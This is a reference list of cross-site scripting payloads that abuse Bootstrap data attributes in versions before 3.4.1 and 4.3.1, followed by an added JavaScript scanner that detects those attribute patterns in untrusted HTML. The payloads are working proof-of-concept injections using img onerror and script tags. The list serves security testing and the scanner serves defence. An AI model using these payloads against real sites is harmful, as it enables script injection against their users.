Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
Bootstrap < 3.4.0
✔️ Without user interaction
<x data-spy="affix" data-target="<img src=x onerror=alert(1)>">
Bootstrap < 3.4.0
✔️ Without user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x>
Bootstrap < 3.4.0 || < 4.1.2
➖ Requires user interaction
<a id="x" data-toggle="collapse" href="#x" data-parent="<img src=x onerror=alert(1) />">XSS</a>
Bootstrap < 3.4.0 || < 4.1.2
✔️ Without user interaction
<x data-spy="scroll" data-target="<img src=x onerror=alert(1) />">XSS</x>
Bootstrap < 3.4.0 || < 4.1.2
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<x data-toggle="tooltip" data-container="<img src=x onerror=alert(1) />" title="x">XSS</x>
Bootstrap < 3.4.0 || v4.0.0-beta
➖ Requires user interaction
<x href="<img src=x onerror=alert(0)>" data-dismiss="alert">XSS</x>
<x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x>
<x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x>
etc.
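
A defender-side check for the attribute shapes listed above, as an added example (not from the original page and not Bootstrap code): it scans untrusted HTML for selector-type attributes whose value contains markup, plus `data-template` and `data-html="true"`. The function name, the regex-based tag matching and the sample inputs are assumptions of this example; in a browser, a DOM parser or sanitizer hook would replace the regexes.

```javascript
// Added example, not Bootstrap code. Names and sample inputs are assumptions.
// Attributes the affected plugins expect to hold a CSS selector.
const SELECTOR_ATTRS = new Set([
  'data-target', 'data-parent', 'data-container', 'data-viewport', 'href',
]);

// The browser decodes entities before Bootstrap reads the attribute,
// so encoded forms of "<" have to count as well.
const decodeLt = (v) => v.replace(/&(?:lt|#0*60|#x0*3c);?/gi, '<');

// Simplified tag/attribute matching (assumption: used as a pre-filter only).
const TAG_RE = /<([a-z][^\s\/>]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/gi;
const ATTR_RE = /([^\s=>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function findBootstrapGadgets(html) {
  const findings = [];
  for (const tag of html.matchAll(TAG_RE)) {
    for (const m of tag[2].matchAll(ATTR_RE)) {
      const attr = m[1].toLowerCase();
      const value = decodeLt(m[2] ?? m[3] ?? m[4] ?? '');
      if (SELECTOR_ATTRS.has(attr) && value.includes('<')) {
        // A CSS selector never needs "<".
        findings.push({ tag: tag[1], attr, reason: 'markup in selector attribute' });
      } else if (attr === 'data-template') {
        findings.push({ tag: tag[1], attr, reason: 'custom tooltip template' });
      } else if (attr === 'data-html' && value.toLowerCase() === 'true') {
        findings.push({ tag: tag[1], attr, reason: 'title/content rendered as HTML' });
      }
    }
  }
  return findings;
}

// Sample inputs: "listed" is taken from the list above, the others are constructed.
const SAMPLES = {
  listed: '<x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x>',
  encoded: '<a data-toggle="collapse" data-target="&lt;img src=x&gt;">menu</a>',
  benign: '<button data-toggle="collapse" data-target="#menu">Menu</button>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, findBootstrapGadgets(html));
}
```

Markup that produces any finding should be rejected or have the attribute stripped before it reaches a page that loads a Bootstrap version inside the ranges listed above.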